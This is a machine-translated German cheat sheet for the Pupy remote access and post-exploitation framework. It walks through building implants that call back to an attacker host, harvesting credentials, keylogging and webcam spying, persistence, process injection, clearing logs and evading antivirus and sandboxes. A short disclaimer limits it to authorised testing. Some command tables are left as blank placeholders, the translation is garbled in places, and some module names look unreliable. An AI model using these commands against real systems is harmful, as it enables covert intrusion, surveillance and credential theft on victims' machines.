Zum Inhalt

Pupy C2 Framework Cheat Sheet

_

Im Überblick

Pupy ist ein Open-Source-, Cross-Platform Remote Access Tool (RAT) und Post-Exploitation Framework geschrieben in Python und C. Es unterstützt Windows-, Linux-, OSX- und Android-Plattformen mit Memory-only Ausführung Fähigkeiten und minimale Footprint-Design.

ZEITSCHRIFTEN Warning: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

• Installation

Git Installation

```bash

Clone repository

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy

Install dependencies (Ubuntu/Debian)

sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev

Install Python requirements

pip install -r pupy/requirements.txt

Create workspace

./create-workspace.py -DG pupyws cd pupyws ```_

Docker Installation

```bash

Build Docker image

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy docker build -t pupy .

Run Pupy in Docker

docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy ```_

Windows Installation

```bash

Install Python 2.7

Download and install Microsoft Visual C++ Compiler for Python 2.7

Clone repository

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy

Install requirements

pip install -r pupy/requirements.txt

Create workspace

python create-workspace.py pupyws cd pupyws ```_

oder Basisnutzung

Starting Pupy Server

```bash

Start server with default configuration

./pupysh

Start with custom configuration

./pupysh --config custom_config.py

Start with specific transport

./pupysh --transport ssl ```_

Client Generation

```bash

Generate Windows client

gen -f client -O windows -A x86 -o windows_client.exe

Generate Linux client

gen -f client -O linux -A x64 -o linux_client

Generate Android APK

gen -f apk -o android_client.apk ```_

Befehlsnummer

Server Management

Command Description
INLINE_CODE_31 Show help menu
INLINE_CODE_32 List active sessions
INLINE_CODE_33 Interact with session
INLINE_CODE_34 List running jobs
INLINE_CODE_35 Kill running job
INLINE_CODE_36 Exit Pupy server
_
### Client Generation
Command Description
--------- -------------
INLINE_CODE_37 Show generation help
INLINE_CODE_38 Generate client
INLINE_CODE_39 Generate Android APK
INLINE_CODE_40 Generate Python payload
INLINE_CODE_41 Generate PowerShell payload

Session Interaction

Command Description
INLINE_CODE_42 Show session information
INLINE_CODE_43 Get interactive shell
INLINE_CODE_44 Upload file
INLINE_CODE_45 Download file
INLINE_CODE_46 Take screenshot
INLINE_CODE_47 Take webcam snapshot
INLINE_CODE_48 Start keylogger

Optionen der Client-Generierung

Windows Clients

```bash

Windows executable (x86)

gen -f client -O windows -A x86 -o windows_x86.exe

Windows executable (x64)

gen -f client -O windows -A x64 -o windows_x64.exe

Windows DLL

gen -f dll -O windows -A x86 -o windows_dll.dll

Windows service executable

gen -f client -O windows -A x64 --service -o windows_service.exe

PowerShell payload

gen -f ps1 -o payload.ps1 ```_

Linux Clients

```bash

Linux ELF (x86)

gen -f client -O linux -A x86 -o linux_x86

Linux ELF (x64)

gen -f client -O linux -A x64 -o linux_x64

Linux shared library

gen -f so -O linux -A x64 -o linux_lib.so

Python payload

gen -f py -o payload.py ```_

macOS Clients

```bash

macOS binary

gen -f client -O darwin -A x64 -o macos_client

macOS application bundle

gen -f app -O darwin -A x64 -o macos_app.app ```_

Android Clients

```bash

Android APK

gen -f apk -o android_client.apk

Android APK with custom package name

gen -f apk --package com.example.app -o custom_android.apk ```_

Transportmöglichkeiten

SSL Transport

```bash

Start SSL listener

listen --port 443 ssl

Generate client with SSL transport

gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443 ```_

HTTP Transport

```bash

Start HTTP listener

listen --port 80 http

Generate client with HTTP transport

gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80 ```_

TCP Transport

```bash

Start TCP listener

listen --port 4444 tcp

Generate client with TCP transport

gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444 ```_

Obfuscated Transports

```bash

Obfs3 transport

listen --port 8080 obfs3

Generate client with obfs3

gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080 ```_

Post-Exploitation Module

System Information

```bash

Get system information

run sysinfo

Get environment variables

run getenv

Get installed software

run installed_software

Get running processes

run ps

Get network connections

run netstat ```_

Credential Harvesting

```bash

Dump Windows credentials

run hashdump

Extract browser passwords

run browser_dump

Dump WiFi passwords

run wifi_passwords

Extract clipboard content

run clipboard ```_

Persistence

```bash

Install persistence

run persistence

Create scheduled task (Windows)

run schtasks

Registry persistence (Windows)

run registry_persistence

Cron job persistence (Linux)

run cron_persistence ```_

Network Operations

```bash

Port scanning

run portscan -t 192.168.1.0/24

Network discovery

run network_discovery

ARP spoofing

run arp_spoof -t 192.168.1.10 -g 192.168.1.1

DNS spoofing

run dns_spoof -d example.com -i 192.168.1.100 ```_

Surveillance

```bash

Start keylogger

run keylogger

Take screenshot

run screenshot

Record microphone

run record_mic -t 30

Webcam snapshot

run webcam_snap

Webcam stream

run webcam_stream ```_

Erweiterte Eigenschaften

Memory Execution

```bash

Load module in memory

load_module /path/to/module.py

Execute in memory

run memory_exec -f /path/to/executable

Reflective DLL loading (Windows)

run reflective_dll -f /path/to/dll.dll ```_

Prozessinjektion

```bash

Inject into process

run inject -p -f /path/to/payload

Process hollowing

run process_hollow -t notepad.exe -f /path/to/payload

DLL injection

run dll_inject -p -f /path/to/dll.dll ```_

Pivoting

```bash

SOCKS proxy

run socks -p 1080

Port forwarding

run portfwd -L 8080:192.168.2.10:80

Reverse port forwarding

run portfwd -R 9090:127.0.0.1:22 ```_

Anti-Forensics

```bash

Clear event logs (Windows)

run clear_logs

Timestomp files

run timestomp -f /path/to/file -t "2020-01-01 12:00:00"

Secure delete

run secure_delete -f /path/to/file

Clear tracks

run clear_tracks ```_

Evasion Techniques

Payload Obfuscation

```bash

Generate with packer

gen -f client -O windows -A x64 --packer upx -o packed_client.exe

Custom obfuscation

gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe

Encrypted payload

gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe ```_

Anti-Analysis

```python

VM detection

def check_vm(): import subprocess try: output = subprocess.check_output(['systeminfo'], shell=True) vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V'] for indicator in vm_indicators: if indicator in output.decode(): return True except: pass return False

Sandbox evasion

import time import random time.sleep(random.randint(60, 300)) # Random sleep ```_

Traffic Obfuscation

```bash

Domain fronting

gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com

Custom User-Agent

gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ```_

Konfiguration

Server Konfiguration

```python

pupy.conf

[pupyd] workdir = pupyws scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin

[ssl] keyfile = keys/server.key certfile = keys/server.crt

[http] port = 80 ssl_port = 443

[logging] level = INFO file = pupy.log ```_

Client Configuration

```python

Custom transport configuration

TRANSPORT_KWARGS = \\{ 'ssl': \\{ 'cert_reqs': ssl.CERT_NONE, 'ssl_version': ssl.PROTOCOL_TLSv1_2, 'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM' \\}, 'http': \\{ 'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'headers': \\{'Accept': 'text/html,application/xhtml+xml'\\}, 'proxy': \\{'http': 'http://proxy:8080'\\} \\} \\} ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check listener status

jobs

Test connectivity

telnet server_ip port

Check firewall rules

iptables -L netsh advfirewall show allprofiles ```_

Probleme der Client Generation

```bash

Install missing dependencies

pip install -r pupy/requirements.txt

Rebuild client templates

./create-workspace.py -DG pupyws

Check Python version

python --version # Should be 2.7.x ```_

Modul Loading Errors

```bash

Update module path

export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy

Reinstall requirements

pip install --upgrade -r pupy/requirements.txt

Check module dependencies

python -c "import module_name" ```_

Performance Issues

```bash

Reduce beacon interval

session -i set_beacon_interval 30

Optimize transport

Use faster transports like TCP for internal networks

Use compressed transports for slow connections

```_

Operationelle Sicherheit

Infrastruktur Setup

  • Verwenden Sie Umlenker und Proxyketten
  • Durchführung ordnungsgemäßer Zertifikatsverwaltung
  • Verwenden Sie legitime Domains und Hosting
  • Infrastruktur regelmäßig drehen
  • Monitor für Erkennung und Zuschreibung

Kommunikationssicherheit

  • Verwenden Sie verschlüsselte Transporte (SSL/TLS)
  • Implementierung der richtigen Schlüsselverwaltung
  • Verwenden Sie Domain-Front, wo möglich
  • Vary Kommunikationsmuster
  • Implementierung einer korrekten Fehlerbehandlung

Payload Security

  • Verstopfung und Verpackung verwenden
  • Implementierung von Anti-Analyse-Techniken
  • Benutzen Sie gestufte Nutzlasten, wenn möglich
  • Regelmäßig aktualisieren und rotieren Nutzlasten
  • Ja. Test gegen aktuelle AV-Lösungen

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Pupy C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *